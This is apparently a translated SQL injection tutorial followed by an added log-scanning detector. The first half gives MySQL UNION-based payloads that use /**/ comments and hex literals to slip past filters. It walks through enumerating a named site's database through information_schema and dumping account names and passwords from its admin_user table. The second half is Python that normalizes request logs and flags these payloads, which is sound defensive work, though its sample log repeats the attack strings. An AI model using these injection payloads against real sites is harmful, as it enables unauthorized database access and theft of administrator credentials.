Enumerate databases:
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*

Enumerate tables:
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=[hex value of the database name]/**/limit/**/1,1

Enumerate columns:
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=[hex value of the table name]/**/limit/**/1,1

MySQL 5 advanced injection method: dumping tables through information_schema

Example:

1. Dump table names
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574 is the hex encoding of the database name yd_teamnet)
Stepping the limit offset this way, the admin_user table showed up at the 4th entry.

2. Dump column names
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

3. Dump passwords
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
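The payloads above rely on two evasion tricks that defeat naive request filters: /**/ comments in place of spaces, and 0x... hex literals in place of quoted strings. The following is an added detection example, not code from the original post: it normalizes request query strings from constructed access-log lines (percent-decoding, collapsing comments to spaces, lowercasing), flags requests that pair a UNION SELECT with one of the information_schema views used in the three steps, and decodes the hex literals so an analyst can see which schema and table were being enumerated. The log format, client addresses and paths are assumptions made for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original post). The query
# strings mirror the /**/-obfuscated information_schema payloads described
# above; the client addresses and the percent-encoded variant are invented.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /ccaus_content.php?ccausid=13240 HTTP/1.1" 200 5120
203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* HTTP/1.1" 200 5133
203.0.113.5 - - [01/Jan/2024:10:00:03 +0000] "GET /ccaus_content.php?ccausid=13240%2F**%2Fand%2F**%2F1%3D2%2F**%2FuNiOn%2F**%2FsElEcT%2F**%2F1,2,3,COLUMN_NAME,5%2F**%2Ffrom%2F**%2Finformation_schema.COLUMNS%2F**%2Fwhere%2F**%2FTABLE_NAME%3D0x61646D696E5F75736572%2F**%2Flimit%2F**%2F0,1%2F* HTTP/1.1" 200 5140
198.51.100.7 - - [01/Jan/2024:10:00:04 +0000] "GET /search.php?q=union+station+schedule HTTP/1.1" 200 8800
"""

# Common-log-format request line: client, then the request target after the method.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')
# MySQL inline comment, which the payloads use as a space substitute.
COMMENT_RE = re.compile(r'/\*.*?\*/', re.DOTALL)
UNION_RE = re.compile(r'\bunion\s+(?:all\s+)?select\b')
SCHEMA_RE = re.compile(r'\binformation_schema\.(schemata|tables|columns)\b')
HEX_RE = re.compile(r'0x([0-9a-f]{2,})\b')


def normalize(query: str) -> str:
    """Undo the evasions: percent-encoding (twice, for double encoding),
    /**/ in place of whitespace, and mixed-case keywords."""
    decoded = query
    for _ in range(2):
        decoded = unquote_plus(decoded)
    spaced = COMMENT_RE.sub(' ', decoded)
    return re.sub(r'\s+', ' ', spaced).lower()


def decode_hex_literals(text: str) -> list:
    """Decode MySQL 0x... string literals that decode to printable ASCII,
    so the schema/table names being enumerated are visible to an analyst."""
    names = []
    for m in HEX_RE.finditer(text):
        try:
            raw = bytes.fromhex(m.group(1))
        except ValueError:  # odd-length run, not a valid literal
            continue
        if raw and all(32 <= b < 127 for b in raw):
            names.append(raw.decode('ascii'))
    return names


def scan(log_text: str) -> list:
    """Return one finding per request whose normalized query string pairs a
    UNION SELECT with an information_schema view."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.group(1), m.group(2)
        if '?' not in target:
            continue
        path, query = target.split('?', 1)
        norm = normalize(query)
        schema = SCHEMA_RE.search(norm)
        if UNION_RE.search(norm) and schema:
            findings.append({
                'client': client,
                'path': path,
                'view': schema.group(1),
                'decoded_literals': decode_hex_literals(norm),
            })
    return findings


if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f)
```

The benign search for "union station schedule" is not flagged because the rule requires both a UNION SELECT and an information_schema view; the third log line, which percent-encodes the comments and mixes keyword case, is still caught once normalized, and its 0x61646D696E5F75736572 literal decodes to the table name the post targets.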